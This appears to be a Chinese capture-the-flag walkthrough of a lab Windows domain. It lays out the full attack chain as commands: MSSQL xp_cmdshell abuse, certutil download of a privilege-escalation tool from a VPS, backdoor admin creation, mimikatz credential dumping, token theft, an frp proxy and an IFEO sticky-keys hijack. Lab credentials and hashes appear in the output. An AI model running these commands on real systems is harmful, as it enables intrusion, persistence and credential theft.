春秋云镜Tsclient-wp

外网探测
1. 端口扫描
内网渗透

外网探测

端口扫描

使用fscan进行扫描【不知道为什么kali上的用不了。。。。】

然后发现存在mssql的弱口令而且还是sa(sysadmin)用户，可以用来执行shell

内网渗透

通过MSSQL获得shel

使用navicat连接，执行以下命令来开启xp_cmdshell

exec sp_configure 'show advanced options', 1; 
RECONFIGURE;  
exec sp_configure'xp_cmdshell', 1; 
RECONFIGURE;

使用以下命令来执行系统命令

1	exec master..xp_cmdshell 'systeminfo'

查看系统信息

1 2	OS 名称:Microsoft Windows Server 2016 Datacenter OS 版本:10.0.14393 暂缺 Build 14393

执行以下命令，查看用户的权限，来使用合适的提权方式

1	exec master..xp_cmdshell 'whoami /priv'

特权名                        描述                 状态  
============================= ==================== ======
SeAssignPrimaryTokenPrivilege 替换一个进程级令牌   已禁用
SeIncreaseQuotaPrivilege      为进程调整内存配额   已禁用
SeChangeNotifyPrivilege       绕过遍历检查         已启用
SeImpersonatePrivilege        身份验证后模拟客户端 已启用
SeCreateGlobalPrivilege       创建全局对象         已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集       已禁用

这里开启了SeImpersonatePrivilege特权，所以可以进行令牌窃取

Sweetpotato提权

选择使用sweetpotato进行提权，他是一个集成工具

然后是将这个文件下载下来，使用Certutil来下载文件【参考Windows下命令行下载文件总结】

将文件放在公网vps上，然后进行下载，要找有权限下载的地方,mssql服务就肯定是找他的目录了，为C:\Users\MSSQLSERVER

1	python3 -m http.server 9999

1	exec master..xp_cmdshell 'certutil.exe -urlcache -split -f http://vps:9999/SweetPotato.exe c:\Users\MSSQLSERVER\sweet.exe';

然后使用sweetpotato进行提权

远程登录

创建用户，添加到管理员组

1 2	exec master..xp_cmdshell 'C:\Users\MSSQLSERVER\sweet.exe -a "net user v2i 123456@qwe /add"' exec master..xp_cmdshell 'C:\Users\MSSQLSERVER\sweet.exe -a "net localgroup administrators v2i /add"'

查看rdp有没有开

1	exec master..xp_cmdshell 'C:\Users\MSSQLSERVER\sweet.exe -a "REG QUERY \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections"'

如果结果为0x0就是开启，否则就是关闭

然后手动开启

1	exec master..xp_cmdshell 'C:\Users\MSSQLSERVER\sweet.exe -a "reg add \"HKLM\SYSTEM\CUrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"'

然后使用kali的remmina进行rdp登录

flag1

得到第一个flag:flag{4f0113da-d86f-4728-9e72-d995584450ff}

在进行信息搜集的时候，发现这个机器不在域内。。

先使用fscan进行内网探测，我是使用共享文件夹的方式进行上传的

内网主机扫描

1	fscan64.exe -h 172.22.8.0/24

得到结果

172.22.8.18:445 open
172.22.8.31:139 open
172.22.8.46:139 open
172.22.8.15:139 open
172.22.8.31:135 open
172.22.8.18:139 open
172.22.8.46:135 open
172.22.8.15:135 open
172.22.8.18:135 open
172.22.8.46:80 open
172.22.8.18:80 open
172.22.8.15:88 open
172.22.8.31:445 open
172.22.8.18:1433 open
172.22.8.46:445 open
172.22.8.15:445 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo:
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
[*] NetInfo:
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
[*] NetInfo:
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
[*] NetInfo:
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
[*] NetBios: 172.22.8.15     [+]DC XIAORANG\DC01
[*] NetBios: 172.22.8.31     XIAORANG\WIN19-CLIENT
[*] NetBios: 172.22.8.46     WIN2016.xiaorang.lab                Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.8.18        code:200 len:703    title:IIS Windows Server
[*] WebTitle: http://172.22.8.46        code:200 len:703    title:IIS Windows Server
[+] mssql:172.22.8.18:1433:sa 1qaz!QAZ

所以内网还存在其他三台主机

1
2
3

172.22.8.15     [+]DC XIAORANG\DC01 域控
172.22.8.31     XIAORANG\WIN19-CLIENT
172.22.8.46     WIN2016.xiaorang.lab

使用mimikatz来提取用户hash，要用管理员权限打开命令行

1	mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit

令牌窃取

这里发现了John用户的hash

Authentication Id : 0 ; 594235 (00000000:0009113b)
Session           : RemoteInteractive from 2
User Name         : John
Domain            : WIN-WEB
Logon Server      : WIN-WEB
Logon Time        : 2023/2/25 14:27:17
SID               : S-1-5-21-4088072006-1921831747-1237773115-1008
	msv :	
	 [00000003] Primary
	 * Username : John
	 * Domain   : WIN-WEB
	 * NTLM     : eec9381b043f098b011be51622282027
	 * SHA1     : 18056c7dda082b2b219dbaac6157a1fb234403bc
	tspkg :	
	wdigest :	
	 * Username : John
	 * Domain   : WIN-WEB
	 * Password : (null)
	kerberos :	
	 * Username : John
	 * Domain   : WIN-WEB
	 * Password : (null)
	ssp :	
	credman :

但是解不出来，所以没啥用

查看网络连接状态，发现有其他用户使用rdp连接了这台主机

使用query user（简写quser），发现是john在连接

所以这台主机是存在John的令牌的，尝试令牌窃取，使用SharpToken如果报错的话，就去网上找，按照对应的东西就行

执行以下命令进行令牌窃取

1	SharpToken.exe execute "WIN-WEB\John" cmd true

成功窃取到John的令牌，来开启命令行

使用net use查看有网络共享

查看发行了一个xiaorang.lab域用户的账户密码，并给出了提示，镜像劫持

xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

frp内网代理

这里先使用frp搭建一个内网代理，否则无法从外部连接到目标机器

frpc.ini

[common]
server_addr = <vpsip>
server_port = 9998

[socks5]
type = tcp
remote_port = 1000 #需要vps打开对应的端口
plugin = socks5

frps.ini

1 2	[common] bind_port = 9998

kali要配置/etc/proxychains4.conf

1	socks5 <vpsip> 1000

先使用CME来探测一下这个用户可以在哪个主机上登录

1	proxychains crackmapexec smb 172.22.8.0/24 -u Aldrich -p 'Ald@rLMWuy7Z!#' --loggedon-users

有三个主机提示密码到期

1
2
3

172.22.8.46 
172.22.8.31 
172.22.8.15 域控

因为没有啥好用的方法，所以一个个试

1	proxychains rdesktop 172.22.8.46

发现172.22.8.46 可以登录，然后按照要求修改密码即可

映像劫持

但是发现不是高权限用户，按照提示使用映像劫持（IFEO）

先查看一下注册表权限

使用powershell

1 2	Get-Acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" \| fl * # fl表示格式化输出，*表示输出所有列

发现所有用户都可以创建键值

设置劫持粘滞键sethc（按5次shift出现）

1	reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe"

然后锁定用户，按5次shift，弹出命令行，提权到system